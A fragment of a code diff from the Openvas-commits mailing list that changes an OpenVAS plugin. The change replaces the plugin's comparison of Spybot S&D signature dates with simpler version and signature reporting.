-sigs_vendor_mmddyyyy = string(
- substr(sigs_vendor_yyyymmdd, 4, 5),
- "/",
- substr(sigs_vendor_yyyymmdd, 6, 7),
- "/",
- substr(sigs_vendor_yyyymmdd, 0, 3)
-);
+ if(version && sigs_target_mmddyyyy) {
+
+ report = string(
+ desc,
+ "\n\n",
+ "Plugin output :\n\n",
+ "Version : ", version, "\n",
+ "Signatures : ", sigs_target_mmddyyyy);
+
+ if(report_verbosity > 0) {
+ security_note(port:port, data:report);
+ exit(0);
+ }
+ }
+ }
+ }
+ break;
+ }
+ }
-# Generate report.
-report = string(
- desc,
- "\n\n",
- "Plugin output :\n\n",
- " Version : ", ver, "\n",
- " Signatures : ", sigs_target_mmddyyyy
-);
-
-if (sigs_target == "n/a")
-{
- report = string(
- report,
- "\n\n",
- "The remote host has never updated its Spybot S&D detection rule\n",
- "signatures. The latest version is ", sigs_vendor_mmddyyyy, ". As a result, the\n",
- "remote host might contain malware."
- );
- security_hole(port:kb_smb_transport(), data:report);
-}
-else if (sigs_target_yyyymmdd)
-{
- if (int(sigs_target_yyyymmdd) < int(sigs_vendor_yyyymmdd))
- {
- report = string(
- report,
- "\n\n",
- "The remote host has an out-dated version of the Spybot S&D\n",
- "detection rule signatures; the most recent set is ", sigs_vendor_mmddyyyy, ".\n",
- "As a result, the remote host might contain malware."
- );
- security_hole(port:kb_smb_transport(), data:report);
- }
- else security_note(port:kb_smb_transport(), data:report);
-}
+exit(0);
More information about the Openvas-commits
mailing list